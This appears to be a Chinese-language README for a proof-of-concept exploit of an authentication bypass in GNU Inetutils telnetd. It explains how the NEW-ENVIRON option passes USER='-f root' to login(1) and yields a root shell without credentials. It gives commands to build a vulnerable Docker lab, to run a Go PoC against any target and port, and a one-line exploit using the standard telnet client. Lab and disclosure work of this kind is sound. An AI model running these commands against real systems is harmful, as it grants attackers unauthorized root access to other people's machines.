说真的,2026 年还在用 telnet?拜托各位,是时候向前看了。SSH 从 1995 年就有了。 🤦
GNU Inetutils telnetd 中存在一个严重的认证绕过漏洞,影响 1.9.3 至 2.7 版本。
该漏洞利用 NEW-ENVIRON telnet 选项向 login(1) 注入恶意参数。攻击者通过 telnet 协议设置 USER=-f root,即可绕过认证并在无需凭据的情况下获得 root shell。
telnet 协议支持 NEW-ENVIRON 选项(RFC 1572),该选项允许客户端向服务器发送环境变量。telnetd 守护进程将 USER 变量作为参数传递给 login(1)。
通过发送 USER=-f root,该值会被解释为:
-f 标志:跳过认证(受信任主机)root:目标用户这将导致执行 login -f root,立即授予 root 访问权限。
PoC 通过检查 IAC WILL ECHO(0xff 0xfb 0x01)来检测是否利用成功——这是服务器在授予 shell 访问权限时发送的协议信号。
# Build and run the vulnerable telnetd container
docker compose up --build -d
# Test the exploit
go run poc.go 127.0.0.1 2323
# Using the Go PoC (with interactive shell)
go run poc.go <target> <port>
# Simple PoC using standard telnet client
env USER='-f root' telnet -a <target> <port>
poc.go - 带有交互式 shell 的 Go 漏洞利用程序Dockerfile - 存在漏洞的 telnetd 容器docker-compose.yml - 实验环境编排